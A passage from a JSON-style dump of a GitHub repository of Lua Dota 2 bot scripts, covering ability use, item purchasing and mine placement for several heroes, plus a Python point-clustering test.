npcBot:GetNearbyHeroes(1000, false, BOT_MODE_NONE)\n\tlocal enemies = npcBot:GetNearbyHeroes(1000, true, BOT_MODE_NONE)\n\tlocal enemyCreeps = npcBot:GetNearbyLaneCreeps(1000, true)\n\tlocal allyCreeps = npcBot:GetNearbyLaneCreeps(1000, false)\n\tlocal neutrals = npcBot:GetNearbyNeutralCreeps(1000)\n\t\n\tlocal numAllies = table.getn(allies)\n\tlocal numEnemies = table.getn(enemies)\n\tlocal numEnemyCreeps = table.getn(enemyCreeps)\n\tlocal numAllyCreeps = table.getn(allyCreeps)\n\tlocal numNeutrals = table.getn(neutrals)\n\t\n\tlocal damagedByHero = npcBot:WasRecentlyDamagedByAnyHero(1)\n\tlocal damagedByCreep = npcBot:WasRecentlyDamagedByCreep(1)\n\n\t-- PSIONIC TRAP Usage\n\tif mode == BOT_MODE_ATTACK and psitrap:IsFullyCastable() and action ~= BOT_ACTION_TYPE_USE_ABILITY then\n\t\t-- Make sure you're not overriding traps if you don't want to\n\t\tif table.getn(npcBot.traps) ~= (npcBot.max_traps * psitrap:GetLevel()) then\n\t\t\t\n\t\t\n\t\telseif mode == BOT_MODE_ATTACK then -- Override traps if needed\n\t\t\tlocal target = npcBot:GetAttackTarget()\n\t\t\t\n\t\t\tif target ~= nil then\n\t\t\t\tlocal targetDist = GetUnitToUnitDistance(npcBot, target)\n\t\t\t\t\n\t\t\t\tif targetDist < 100 and not npcBot:HasModifier(\"modifier_templar_assassin_meld\") and action ~= BOT_ACTION_TYPE_ATTACK then\n\t\t\t\t\tlocal trapLoc = target:GetExtrapolatedLocation(0.5)\n\t\t\t\t\t\n\t\t\t\t\tnpcBot:Action_UseAbilityOnLocation(psitrap, trapLoc)\n\t\t\t\tend\n\t\t\tend\n\t\tend\n\tend\n\t\n\t-- REFRACTION Usage\n\tif action ~= BOT_ACTION_TYPE_USE_ABILITY and not npcBot:HasModifier(\"modifier_templar_assassin_refraction_absorb\") then\n\t\tif damagedByHero or damagedByCreep and hpPercent < 0.5 then\n\t\t\tnpcBot:Action_UseAbility(refraction)\n\t\tend\n\tend\n\t\n\t-- MELD, REFRACTION, and BLINK attacking\n\tif mode == BOT_MODE_ATTACK and action ~= BOT_ACTION_TYPE_USE_ABILITY then\n\t\tif not npcBot:HasModifier(\"modifier_templar_assassin_refraction_absorb\") then\n\t\t\tif refraction:IsFullyCastable() then\n\t\t\t\tnpcBot:Action_UseAbility(refraction)\n\t\t\tend\n\t\telseif meld:IsFullyCastable() then\n\t\t\tlocal target = npcBot:GetAttackTarget()\n\t\t\t\n\t\t\tif target ~= nil then\n\t\t\t\tlocal targetDist = GetUnitToUnitDistance(target, npcBot)\n\t\t\t\t\n\t\t\t\tif targetDist > 100 then\n \t\t\t\tlocal available, blink = _G.getItemAvailable(\"item_blink\", npcBot)\n \t\t\t\t\n \t\t\t\tif available and blink:IsFullyCastable() then\n \t\t\t\t\tnpcBot:Action_UseAbilityOnLocation(blink, target:GetLocation() + RandomVector(50))\n \t\t\t\telse\n \t\t\t\t\tnpcBot:Action_MoveToLocation(target:GetLocation() + RandomVector(20))\n \t\t\t\tend\n\t\t\t\telse\n\t\t\t\t\tif not npcBot:HasModifier(\"modifier_templar_assassin_meld\") and meld:IsFullyCastable() then\n\t\t\t\t\t\tnpcBot:Action_UseAbility(meld)\n\t\t\t\t\telse\n\t\t\t\t\t\tnpcBot:Action_AttackUnit(target, true)\n\t\t\t\t\tend\n\t\t\t\tend\n\t\t\tend\n\t\telse\n\t\t\t\n\t\tend\n\tend\nend\n\nfunction useSoulRing()\n\tlocal botMana = npcBot:GetMana()\n\tlocal botHP = npcBot:GetHealth()\n\t-- SOUL RING Usage\n local soulLoc = npcBot:FindItemSlot(\"item_soul_ring\")\n local soul = nil\n if npcBot:GetItemSlotType(soulLoc) == ITEM_SLOT_TYPE_MAIN then\n soul = npcBot:GetItemInSlot(soulLoc)\n end\n if soul ~= nil then\n if soul:IsFullyCastable() and botMana < 200 and botHP > 400 then\n npcBot:Action_UseAbility(soul)\n end\n end\nend\n\nfunction getArmorMultiplier(armor)\n\treturn 1 - (0.05 * armor / (1 + 0.05 * math.abs(armor)))\nend\n\nfunction BuybackUsageThink()\n if DotaTime() < -30 and lane_claim then\n local lane_id = npcBot:GetAssignedLane()\n if lane_id == 1 then\n npcBot:ActionImmediate_Chat(\"I'm going Top!\", false)\n elseif lane_id == 2 then\n npcBot:ActionImmediate_Chat(\"I'm going Mid!\", false)\n elseif lane_id == 3 then\n npcBot:ActionImmediate_Chat(\"I'm going Bot!\", false)\n end\n lane_claim = false\n end\n return\nend\n"
},
{
"alpha_fraction": 0.7655172348022461,
"alphanum_fraction": 0.7724137902259827,
"avg_line_length": 23.16666603088379,
"blob_id": "925cdaa2e69604443410a743d8113f94500ea317",
"content_id": "5f1693a2c2c87534764a99ffeeb602498f3ae7f6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Lua",
"length_bytes": 145,
"license_type": "no_license",
"max_line_length": 50,
"num_lines": 6,
"path": "/mode_side_shop_legion_commander.lua",
"repo_name": "vpus/vpesports-enhanced-bot",
"src_encoding": "UTF-8",
"text": "require(GetScriptDirectory()..\"/UtilityData\")\nrequire(GetScriptDirectory()..\"/UtilityFunctions\")\n\nfunction GetDesire()\n\treturn _G.desires[1]\nend\n"
},
{
"alpha_fraction": 0.3698156774044037,
"alphanum_fraction": 0.447388619184494,
"avg_line_length": 24,
"blob_id": "f60953ca44c9f4e8e4058d2d4bcacad10cb77940",
"content_id": "bbf4db44326a2946e539d6d3ca77542d43b07712",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2604,
"license_type": "no_license",
"max_line_length": 118,
"num_lines": 104,
"path": "/other/test.py",
"repo_name": "vpus/vpesports-enhanced-bot",
"src_encoding": "UTF-8",
"text": "import time\n\ndef getDistance(p1, p2):\n return ((p1[0] - p2[0])*(p1[0] - p2[0]) + (p1[1] - p2[1])*(p1[1] - p2[1]))**(1/2)\n\ndef samePoint(p1, p2):\n return p1[0] == p2[0] and p1[1] == p2[1]\n\ndef inGroup(group, point):\n for p in group:\n if p[0] == point[0] and p[1] == point[1]:\n return True\n \n return False\n\ntrees = [\n [400,550],\n [420,530],\n [300,450],\n [350,420],\n [475,500],\n [375,475],\n [325,520],\n [330,620],\n [450,425],\n [900,800],\n [920,850],\n [935,750],\n [950,775],\n [975,800],\n [850,700],\n [835,750],\n [900,700],\n [950,715],\n [850,850],\n [1200, 200]\n]\n\n# go through each point and check against every other point to see if the distance is close enough, if yes, group them\n\n# for _ in range(0, 60):\n# for point1 in trees:\n# group = [point1]\n# for point2 in trees:\n# dist = getDistance(point1, point2)\n# \n# if dist < 100 and not inGroup(group, point2):\n# group.append(point2)\n# for point3 in trees:\n# dist2 = getDistance(point2, point3)\n# \n# if dist2 < 100 and not inGroup(group, point3):\n# group.append(point3)\n# groups.append(group)\n# print(time.time() - start)\n\n# for group in groups:\n# for point in group:\n# print(str(point[0]) + \", \" + str(point[1]))\n# print(\"-------------------------\")\n\ndef cluster(points):\n clusters = []\n \n while points:\n s = []\n queue = [points.pop()]\n while queue:\n tempQueue = []\n for p1 in queue:\n for p2 in points:\n if not samePoint(p1, p2):\n dist = getDistance(p1, p2)\n \n if dist < 100:\n tempQueue.append(p2)\n \n for p1 in queue:\n if not inGroup(s, p1):\n s.append(p1)\n \n queue = tempQueue;\n \n for p1 in tempQueue:\n for i,p2 in enumerate(points):\n if samePoint(p1, p2):\n del points[i]\n break;\n \n clusters.append(s)\n \n return clusters\n\nstart = time.time()\nfor _ in range(0,60):\n tempList = list(trees)\n clusters = cluster(tempList)\n\nprint(time.time() - start)\n# for cluster in clusters:\n# for point in cluster:\n# print(str(point[0]) + \", \" + str(point[1]))\n# \n# print(\"----------------------\")\n "
},
{
"alpha_fraction": 0.6947869062423706,
"alphanum_fraction": 0.7047371864318848,
"avg_line_length": 33.76691818237305,
"blob_id": "d5d86dcde9ab1401cd6ea4d98fb397f380a2bb71",
"content_id": "c568299ca560f65854817584dd02a92eda4b66a0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Lua",
"length_bytes": 4623,
"license_type": "no_license",
"max_line_length": 150,
"num_lines": 133,
"path": "/mode_roam_techies.lua",
"repo_name": "vpus/vpesports-enhanced-bot",
"src_encoding": "UTF-8",
"text": "require(GetScriptDirectory()..\"/UtilityData\")\nrequire(GetScriptDirectory()..\"/UtilityFunctions\")\n\nlocal npcBot = GetBot()\nlocal botTeam = GetTeam()\nlocal mineCounter = 1\nlocal targetSet = false\n\nfunction OnStart()\n\tnpcBot.other_mode = BOT_MODE_ROAM\n\tnpcBot:Action_ClearActions(true)\nend\n\nfunction OnEnd()\n\tmineCounter = 1\nend\n\nfunction GetDesire()\n\tlocal botLevel = npcBot:GetLevel()\n\tlocal time = DotaTime()\n\t\n\tif time < 0 or botLevel >= 6 then\n\t\treturn _G.desires[6]\n\telse\n\t\treturn _G.desires[0]\n\tend\nend\n\nfunction Think()\n\t-- Abilities\n\tlocal ProximityMine = npcBot:GetAbilityByName(\"techies_land_mines\")\n\tlocal StasisTrap = npcBot:GetAbilityByName(\"techies_stasis_trap\")\n\tlocal BlastOff = npcBot:GetAbilityByName(\"techies_suicide\")\n\tlocal RemoteMine = npcBot:GetAbilityByName(\"techies_remote_mines\")\n\n\tlocal queue = npcBot:NumQueuedActions()\n\tlocal action = npcBot:GetCurrentActionType()\n\tlocal enemyTeam = (botTeam == TEAM_RADIANT) and TEAM_DIRE or TEAM_RADIANT\n\tlocal time = DotaTime()\n\t\n\tlocal enemyTowersTop = getAllTowersInLane(LANE_TOP, enemyTeam)\n\tlocal enemyTowersMid = getAllTowersInLane(LANE_MID, enemyTeam)\n\tlocal enemyTowersBot = getAllTowersInLane(LANE_BOT, enemyTeam)\n\n\tlocal allyTowersTop = getAllTowersInLane(LANE_TOP, botTeam)\n\tlocal allyTowersMid = getAllTowersInLane(LANE_MID, botTeam)\n\tlocal allyTowersBot = getAllTowersInLane(LANE_BOT, botTeam)\n\n\tlocal remoteLocSet = {}\n\t\n\tif time < 0 then\n\t\tlocal tower = GetTower(TEAM_RADIANT, TOWER_TOP_1)\n\t\t\n\t\tif action ~= BOT_ACTION_TYPE_MOVE_TO and action ~= BOT_ACTION_TYPE_USE_ABILITY then\n\t\t\tnpcBot:Action_MoveToLocation(tower:GetLocation())\n\t\tend\n\tend\n\t\n\tif action ~= BOT_ACTION_TYPE_USE_ABILITY and action ~= BOT_ACTION_TYPE_MOVE_TO then\n\t\t-- If all allied towers are destroyed, only plant around base\n\t\tif #allyTowersTop == 0 and #allyTowersMid == 0 and #allyTowersBot == 0 then\n\t\t\tremoteLocSet = _G.rad_base_remote_locs\n\t\t\n\t\t-- If all enemy towers are destroyed, only plant around enemy base\n\t\telseif #enemyTowersTop == 0 and #enemyTowersMid == 0 and #enemyTowersBot == 0 then\n\t\t\tremoteLocSet = _G.dir_base_remote_locs_attack\n\t\t-- If all allied towers in a lane are destroyed, alternate between roaming\n\t\t-- and planting around allied base\n\t\telse\n\t\t\tif #allyTowersTop == 0 then\n \t\t\tlocal tempSet = TableConcat(_G.rad_base_remote_locs, _G.rad_late_remote_locs)\n \t\t\tremoteLocSet = TableConcat(remoteLocSet, tempSet)\n \t\tend\n \t\t\n \t\tif #allyTowersMid == 0 then\n \t\t\tlocal tempSet = TableConcat(_G.rad_base_remote_locs, _G.rad_late_remote_locs)\n \t\t\tremoteLocSet = TableConcat(remoteLocSet, tempSet)\n \t\tend\n \t\t\n \t\tif #allyTowersBot == 0 then\n \t\t\tlocal tempSet = TableConcat(_G.rad_base_remote_locs, _G.rad_late_remote_locs)\n \t\t\tremoteLocSet = TableConcat(remoteLocSet, tempSet)\n \t\tend\n \t\t\n \t\t-- If all enemy towers in a lane are destroyed, alternate between roaming\n \t\t-- and planting around enemy base\n \t\tif #enemyTowersTop == 0 then\n \t\t\tlocal tempSet = TableConcat(_G.rad_base_remote_locs, _G.rad_late_remote_locs)\n \t\t\tremoteLocSet = TableConcat(remoteLocSet, tempSet)\n \t\tend\n \t\t\n \t\tif #enemyTowersMid == 0 then\n \t\t\tlocal tempSet = TableConcat(_G.rad_base_remote_locs, _G.rad_late_remote_locs)\n \t\t\tremoteLocSet = TableConcat(remoteLocSet, tempSet)\n \t\tend\n \t\t\n \t\tif #enemyTowersBot == 0 then\n \t\t\tlocal tempSet = TableConcat(_G.rad_base_remote_locs, _G.rad_late_remote_locs)\n \t\t\tremoteLocSet = TableConcat(remoteLocSet, tempSet)\n \t\tend\n \t\t\t\n \t\tif #enemyTowersBot > 0 and #enemyTowersMid > 0 and #enemyTowersMid > 0 and #allyTowersTop > 0 and #allyTowersMid > 0 and #allyTowersBot > 0 then\n \t\t\tremoteLocSet = TableConcat(_G.rad_early_remote_locs, _G.dir_early_remote_locs) \n \t\tend\n \tend\n\n\t\t-- Set the appropriate remote mine\n\t\tif #remoteLocSet > 0 then\n\t\t\tif mineCounter >= table.getn(remoteLocSet) then\n\t\t\t\tmineCounter = 1\n\t\t\tend\n\t\t\tif RemoteMine:IsFullyCastable() and action ~= _G.actions[\"use_ability\"] then\n\t\t\t\tif mineCounter >= table.getn(remoteLocSet) then\n\t\t\t\t\tmineCounter = 1\n\t\t\t\tend\n\t\t\t\tprint(\" MINE COUNTER: \" .. tostring(mineCounter))\n\t\t\t\tlocal remoteLoc = remoteLocSet[mineCounter]\n\t\t\t\tnpcBot:Action_UseAbilityOnLocation(RemoteMine, remoteLoc)\n\t\t\t\tmineCounter = mineCounter + 1\n\t\t\telseif GetUnitToLocationDistance(npcBot, remoteLocSet[mineCounter]) > 1000 and action ~= BOT_ACTION_TYPE_MOVE_TO then\n\t\t\t\tnpcBot:Action_MoveToLocation(remoteLocSet[mineCounter] + RandomVector(100))\n\t\t\tend\n\t\tend\n\tend\nend\n\n\nfunction TableConcat(t1,t2)\n for i=1,#t2 do\n t1[#t1+1] = t2[i]\n end\n return t1\nend"
},
{
"alpha_fraction": 0.7272074818611145,
"alphanum_fraction": 0.7358219623565674,
"avg_line_length": 26.860000610351562,
"blob_id": "b1f2b315850d947f63fc9265ba7759b55ab3690e",
"content_id": "c556605b06910b29d7a39d16593e0d47a7f0b1d5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Lua",
"length_bytes": 1393,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 50,
"path": "/mode_secret_shop_techies.lua",
"repo_name": "vpus/vpesports-enhanced-bot",
"src_encoding": "UTF-8",
"text": "local npcBot = GetBot()\nlocal botTeam = npcBot:GetTeam()\n\nfunction OnStart()\n\tnpcBot.other_mode = BOT_MODE_SECRET_SHOP\nend\n\nfunction GetDesire()\n\tif npcBot.secretShop then\n\t\treturn 1\n\tend\n\t\n\treturn 0\nend\n\nfunction Think()\n\tlocal secretShopLoc = GetShopLocation(botTeam, SHOP_SECRET)\n--\tlocal courier = GetCourier(0)\n--\tif courier ~= nil then\n--\t\tlocal courierState = GetCourierState(courier)\n--\t\t\n--\t\tif courierState == COURIER_STATE_IDLE then\n--\t\t\t-- send courier to secret shop\n--\t\telseif courierState == COURIER_STATE_DELIVERING_ITEMS then\n--\t\t\t-- send bot to secret shop\n--\t\tend\n--\tend\n\tlocal rearm = npcBot:GetAbilityByName(\"tinker_rearm\");\n\tlocal bootsSlot = npcBot:FindItemSlot(\"item_travel_boots\")\n\tlocal boots = nil\n\tif npcBot:GetItemSlotType(bootsSlot) == ITEM_SLOT_TYPE_MAIN then\n\t\tboots = npcBot:GetItemInSlot(bootsSlot)\n\tend\n\n\tlocal secretDist = npcBot:DistanceFromSecretShop()\n\t\n\tif secretDist > 0 then\n\t\tif boots ~= nil and not npcBot:IsChanneling() and secretDist > 2000 then\n\t\t\tif boots:IsFullyCastable() then\n\t\t\t\tnpcBot:Action_UseAbilityOnLocation(boots, secretShopLoc)\n\t\t\telseif not boots:IsCooldownReady() and rearm:IsOwnersManaEnough() then\n\t\t\t\tnpcBot:Action_UseAbility(rearm)\n\t\t\tend\n\t\telseif (not npcBot:IsChanneling() and secretDist < 2000) or boots == nil then\n\t\t\tnpcBot:Action_MoveToLocation(secretShopLoc)\n\t\tend\n\telse\n\t\tnpcBot.secretShop = false\n\tend\nend\n"
},
{
"alpha_fraction": 0.6868856549263,
"alphanum_fraction": 0.6902421712875366,
"avg_line_length": 34.94827651977539,
"blob_id": "41ad5798c9f5ff763d127d21e9ed474fb39bef74",
"content_id": "92fae3a349d4d2e275e9c8d541177bdd13a0b1e7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Lua",
"length_bytes": 4171,
"license_type": "no_license",
"max_line_length": 111,
"num_lines": 116,
"path": "/item_purchase_abyssal_underlord.lua",
"repo_name": "vpus/vpesports-enhanced-bot",
"src_encoding": "UTF-8",
"text": "local npcBot = GetBot()\n\nlocal purchase = require(GetScriptDirectory() .. \"/item_build_abyssal_underlord\");\n\nlocal itemsPurchase = purchase[\"items\"]\n\nfunction ItemPurchaseThink()\n--\tif GetGameState() ~= GAME_STATE_PRE_GAME and GetGameState() ~= GAME_STATE_GAME_IN_PROGRESS then\n--\t\treturn;\n--\tend\n\t\n\tlocal botHP = npcBot:GetHealth()\n\tlocal botMaxHP = npcBot:GetMaxHealth()\n\tlocal botMana = npcBot:GetMana()\n\tlocal botMaxMana = npcBot:GetMaxMana()\n\t\n\tlocal itemIndex = nil\n\t\n\tfor i = 1, #itemsPurchase do\n\t\tif itemsPurchase[i] ~= \"none\" then\n\t\t\titemIndex = i\n\t\t\tbreak\n\t\tend\n\tend\n\t\n\tif itemIndex == nil then\n\t\treturn\n\tend\n\t\n\tlocal botGold = npcBot:GetGold()\n\tlocal itemCost = GetItemCost(itemsPurchase[itemIndex])\n\t\n\tif botGold >= itemCost then\n\t\tlocal sideShop = IsItemPurchasedFromSideShop(itemsPurchase[itemIndex])\n\t\tlocal secretShop = IsItemPurchasedFromSecretShop(itemsPurchase[itemIndex])\n\t\tlocal sideShopDistance = npcBot:DistanceFromSideShop()\n\t\tlocal secretShopDistance = npcBot:DistanceFromSecretShop()\n\t\tlocal fountainDistance = npcBot:DistanceFromFountain()\n\t\t\n--\t\tprint(\"Side Shop? \" .. tostring(sideShop)\n--\t\t.. \" Secret Shop? \" .. tostring(secretShop)\n--\t\t.. \" Side Shop Distance: \" .. tostring(sideShopDistance) \n--\t\t.. \" Secret Shop Distance: \" .. tostring(secretShopDistance)\n--\t\t.. \" Fountain Distance: \" .. tostring(fountainDistance))\n\t\t\n\t\tif secretShop then\n\t\t\t-- npcBot.secretShop = true -- lets the secret shop mode know to switch\n\t\t\t-- if secretShopDistance == 0 then\n\t\t\t-- \tlocal result = npcBot:ActionImmediate_PurchaseItem(itemsPurchase[itemIndex])\n\t\t\t-- \tprint(\"Purchasing \" .. itemsPurchase[itemIndex] .. \": \" .. tostring(result))\n \t\t-- \tif result == PURCHASE_ITEM_SUCCESS then\n \t\t-- \t\titemsPurchase[itemIndex] = \"none\"\n \t\t-- \telse\n \t\t-- \t\tprint(\" Item Not Purchased: \" .. tostring(result) .. \" : \" .. tostring(itemsPurchase[itemIndex]))\n \t\t-- \tend\n\t\t\t-- end\n\t\t\t-- move courier to secret shop --\n\t\t\tif secretShopDistance > 200000 then\n\t\t\t\tcourier = GetCourier(0)\n\t\t\t\tstate = GetCourierState(courier)\n\t\t\t\tif courier ~= nil then\n\t\t\t\t\tif state == COURIER_STATE_IDLE or state == COURIER_STATE_AT_BASE then\n\t\t\t\t\t\tnpcBot:ActionImmediate_Courier(courier, COURIER_ACTION_SECRET_SHOP)\n\t\t\t\t\tend\n\t\t\t\tend\n\t\t\t\tlocal result = npcBot:ActionImmediate_PurchaseItem(itemsPurchase[itemIndex])\n\t\t\t\tprint(\"Purchasing \" .. itemsPurchase[itemIndex] .. \": \" .. tostring(result))\n\t\t\t\tif result == PURCHASE_ITEM_SUCCESS then\n\t\t\t\t\titemsPurchase[itemIndex] = \"none\"\n\t\t\t\t\tnpcBot:ActionImmediate_Courier(courier, COURIER_ACTION_RETURN)\n\t\t\t\tend\n\t\t\telse\n\t\t\t\tnpcBot.secretShop = true -- lets the secret shop mode know to switch\n\t\t\t\tif secretShopDistance == 0 then\n\t\t\t\t\tlocal result = npcBot:ActionImmediate_PurchaseItem(itemsPurchase[itemIndex])\n\t\t\t\t\tprint(\"Purchasing \" .. itemsPurchase[itemIndex] .. \": \" .. tostring(result))\n\t\t\t\t\tif result == PURCHASE_ITEM_SUCCESS then\n\t\t\t\t\t\titemsPurchase[itemIndex] = \"none\"\n\t\t\t\t\telse\n\t\t\t\t\t\tprint(\" Item Not Purchased: \" .. tostring(result) .. \" : \" .. tostring(itemsPurchase[itemIndex]))\n\t\t\t\t\tend\n\t\t\t\tend\n\t\t\tend\n\t\telseif not secretShop then\n\t\t\tlocal result = npcBot:ActionImmediate_PurchaseItem(itemsPurchase[itemIndex])\n\t\t\tprint(\"Purchasing \" .. itemsPurchase[itemIndex] .. \": \" .. tostring(result))\n\t\t\tif result == PURCHASE_ITEM_SUCCESS then\n\t\t\t\titemsPurchase[itemIndex] = \"none\"\n\t\t\telse\n\t\t\t\tprint(\" Item Not Purchased: \" .. tostring(result) .. \" : \" .. tostring(itemsPurchase[itemIndex]))\n\t\t\tend\n\t\tend\n\tend\n\t\n\tif npcBot:GetStashValue() > 0 then\n\t\tlocal courier = GetCourier(0)\n\t\tlocal state = GetCourierState(courier)\n\t\t\n\t\tif courier ~= nil then\n\t\t\tif state == COURIER_STATE_IDLE or state == COURIER_STATE_AT_BASE and npcBot:IsAlive() then\n\t\t\t\tnpcBot:ActionImmediate_Courier(courier, COURIER_ACTION_TAKE_AND_TRANSFER_ITEMS)\n\t\t\tend\n\t\tend\n\tend\n\n\tif npcBot:GetCourierValue() > 0 then\n\t\tlocal courier = GetCourier(0)\n\t\tlocal state = GetCourierState(courier)\n\t\t\n\t\tif courier ~= nil then\n\t\t\tif state == COURIER_STATE_IDLE or state == COURIER_STATE_AT_BASE and npcBot:IsAlive() then\n\t\t\t\tnpcBot:ActionImmediate_Courier(courier, COURIER_ACTION_TRANSFER_ITEMS)\n\t\t\tend\n\t\tend\n\tend\nend\t\n"
},
{
"alpha_fraction": 0.7212041616439819,
"alphanum_fraction": 0.727748692035675,
"avg_line_length": 22.90625,
"blob_id": "513cf3c827a6c925bc41a822ed8df58993116001",
"content_id": "6e988e1b05c87916fe3195fc08a3faf7691ce61a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Lua",
"length_bytes": 764,
"license_type": "no_license",
"max_line_length": 70,
"num_lines": 32,
"path": "/bot_templar_assassin.lua",
"repo_name": "vpus/vpesports-enhanced-bot",
"src_encoding": "UTF-8",
"text": "require(GetScriptDirectory()..\"/UtilityData\")\nrequire(GetScriptDirectory()..\"/UtilityFunctions\")\n\nlocal npcBot = GetBot()\nlocal botTeam = GetTeam()\nnpcBot.traps = {}\nnpcBot.max_traps = 5\nnpcBot.attacking = false\n\nfunction MinionThink(trap)\n\tlocal trigger = trap:GetAbilityByName(\"templar_assassin_trap\")\n\tlocal trap = trap:GetUnitName();\n\tif trap == \"npc_dota_templar_assassin_psionic_trap\" then\n\t\taddTrap(trap) -- Add trap to list if it isn't already\n\t\t\n\t\tlocal nearbyEnemies = trap:GetNearbyHeroes(380, true, BOT_MODE_NONE)\n\t\t\n\t\tif table.getn(nearbyEnemies) > 0 then\n\t\t\ttrap:Action_UseAbility(trigger)\n\t\tend\n\tend\nend\n\nfunction addTrap(trap)\n\tfor i, v in ipairs(npcBot.traps) do\n\t\tif v == trap then\n\t\t\treturn\n\t\tend\n\tend\n\t\n\ttable.insert(npcBot.traps, trap)\nend"
},
{
"alpha_fraction": 0.6096000075340271,
"alphanum_fraction": 0.6168000102043152,
"avg_line_length": 37.11585235595703,
"blob_id": "1f0f40297fdfb091649c7dee0831741932b34c4b",
"content_id": "b6f6ded341f6dfd3d945940b39e8314e1c5d7adc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Lua",
"length_bytes": 6250,
"license_type": "no_license",
"max_line_length": 165,
"num_lines": 164,
"path": "/ability_item_usage_huskar.lua",
"repo_name": "vpus/vpesports-enhanced-bot",
"src_encoding": "UTF-8",
"text": "local build = require(GetScriptDirectory()..\"/item_build_huskar\")\nrequire(GetScriptDirectory()..\"/UtilityData\")\nrequire(GetScriptDirectory()..\"/UtilityFunctions\")\n\nlocal npcBot = GetBot()\nlocal botTeam = GetTeam()\nlocal lane_claim = true\n\nfunction AbilityLevelUpThink()\n local skillsToLevel = build[\"skills\"]\n-- if npcBot:GetAbilityPoints() < 1 or (GetGameState() ~= GAME_STATE_PRE_GAME \n-- \tand GetGameState() ~= GAME_STATE_GAME_IN_PROGRESS) then\n-- return\n-- end\n -- for i, item in pairs(skillsToLevel) do\n -- print(i, item)\n -- end\n if npcBot:GetAbilityPoints() > 0 and skillsToLevel[1] ~= \"-1\" \n \tand skillsToLevel[1] ~= nil then\n \tnpcBot:ActionImmediate_LevelAbility(skillsToLevel[1])\n \ttable.remove(skillsToLevel, 1)\n end\nend\n\nfunction AbilityUsageThink()\n local botMana = npcBot:GetMana()\n local botHealth = npcBot:GetHealth()\n local botMaxHealth = npcBot:GetMaxHealth()\n local bot_location_x = npcBot:GetLocation()[1]\n local bot_location_y = npcBot:GetLocation()[2]\n local action = npcBot:GetCurrentActionType()\n local action_mode = npcBot:GetActiveMode()\n\n local inner_vitality = npcBot:GetAbilityByName(\"huskar_inner_vitality\")\n local burning_spear = npcBot:GetAbilityByName(\"huskar_burning_spear\")\n local berserkers_blood = npcBot:GetAbilityByName(\"huskar_berserkers_blood\")\n local life_break = npcBot:GetAbilityByName(\"huskar_life_break\")\n\n -- Check if Inner Vitality is castable and if is used --\n if npcBot:HasModifier(\"modifier_huskar_life_break_charge\") and not npcBot:HasModifier(\"modifier_huskar_inner_vitality\") and inner_vitality:IsFullyCastable() then\n print(\"Ability : Using Inner Vitality while Life Break\")\n npcBot:Action_UseAbilityOnEntity(inner_vitality, npcBot)\n end\n\n local armletSlot = npcBot:FindItemSlot(\"item_armlet\")\n local armlet = nil\n if npcBot:GetItemSlotType(armletSlot) == ITEM_SLOT_TYPE_MAIN then\n armlet = npcBot:GetItemInSlot(armletSlot)\n end\n if armlet ~= nil then\n local nearbyEnemies = npcBot:GetNearbyHeroes(900, true, BOT_MODE_NONE)\n if npcBot:HasModifier(\"modifier_item_armlet_unholy_strength\") then\n if armlet:IsFullyCastable() and #nearbyEnemies < 1 and action_mode ~= 2 then\n npcBot:Action_UseAbility(armlet)\n elseif #nearbyEnemies >= 1 and botHealth < 300 then\n npcBot:Action_UseAbility(armlet)\n npcBot:Action_UseAbility(armlet)\n end\n else\n if armlet:IsFullyCastable() and #nearbyEnemies >= 2 then\n npcBot:Action_UseAbility(armlet)\n end\n end\n end\n\n -- Burning Spear Toggle --\n -- print(\"mode:\",action_mode)\n -- print(\"spear mode\", burning_spear:GetAutoCastState())\n if action_mode ~= BOT_MODE_ATTACK then\n -- print(\"not attacking\", burning_spear:GetAutoCastState())\n if burning_spear:GetAutoCastState() then\n -- print(\"Toggle it OFF\")\n burning_spear:ToggleAutoCast()\n end\n else\n -- print(\"attacking\", burning_spear:GetAutoCastState())\n if not burning_spear:GetAutoCastState() then\n -- print(\"Toggle it ON\")\n burning_spear:ToggleAutoCast()\n end\n end\n\n if action ~= BOT_ACTION_TYPE_USE_ABILITY and action ~= BOT_ACTION_TYPE_ATTACK then\n -- life_break think --\n if life_break ~= nil and life_break:IsFullyCastable() then\n action_mode = npcBot:GetActiveMode()\n if action_mode == BOT_MODE_ATTACK then\n local nearbyEnemies = npcBot:GetNearbyHeroes(1200, true, BOT_MODE_NONE)\n local weakerEnemy = nil\n\n for k, enemy in pairs(nearbyEnemies) do\n if weakerEnemy == nil then\n weakerEnemy = enemy\n else\n if enemy:GetRawOffensivePower() < weakerEnemy:GetRawOffensivePower() then\n weakerEnemy = enemy\n end\n end\n end\n\n print(\"Ability : Using Life Break\")\n npcBot:Action_UseAbilityOnEntity(life_break, weakerEnemy)\n end\n end\n\n -- inner vatality think --\n bot_percentage = botHealth / botMaxHealth\n if bot_percentage < 0.35 and not npcBot:HasModifier(\"modifier_huskar_inner_vitality\") and inner_vitality:IsFullyCastable() then\n print(\"Ability : Using Inner Vitality while Life Break\")\n npcBot:Action_UseAbilityOnEntity(inner_vitality, npcBot)\n end\n end\n\n if action_mode == BOT_MODE_LANING then\n -- check creep aggression --\n local nearbyCreeps = npcBot:GetNearbyLaneCreeps(1000, true)\n count = 0\n for i, creep in pairs(nearbyCreeps) do\n if creep:GetAttackTarget() == npcBot then\n count = count + 1\n end\n end\n\n -- check tower aggression --\n local nearbyTowers = npcBot:GetNearbyTowers(700, true)\n for i, tower in pairs(nearbyTowers) do\n if tower:GetAttackTarget() == npcBot then\n count = count + 4\n end\n end\n\n local nearbyEnemies = npcBot:GetNearbyHeroes(700, true, BOT_MODE_NONE)\n local weakerEnemy = nil\n\n for k, enemy in pairs(nearbyEnemies) do\n if weakerEnemy == nil then\n weakerEnemy = enemy\n else\n if enemy:GetHealth() < weakerEnemy:GetHealth() then\n weakerEnemy = enemy\n end\n end\n end\n\n if weakerEnemy ~= nil and count <= 2 then\n npcBot:Action_UseAbilityOnEntity(burning_spear, weakerEnemy)\n end\n end\nend\n\nfunction BuybackUsageThink()\n if DotaTime() < -30 and lane_claim then\n local lane_id = npcBot:GetAssignedLane()\n if lane_id == 1 then\n npcBot:ActionImmediate_Chat(\"I'm going Top!\", false)\n elseif lane_id == 2 then\n 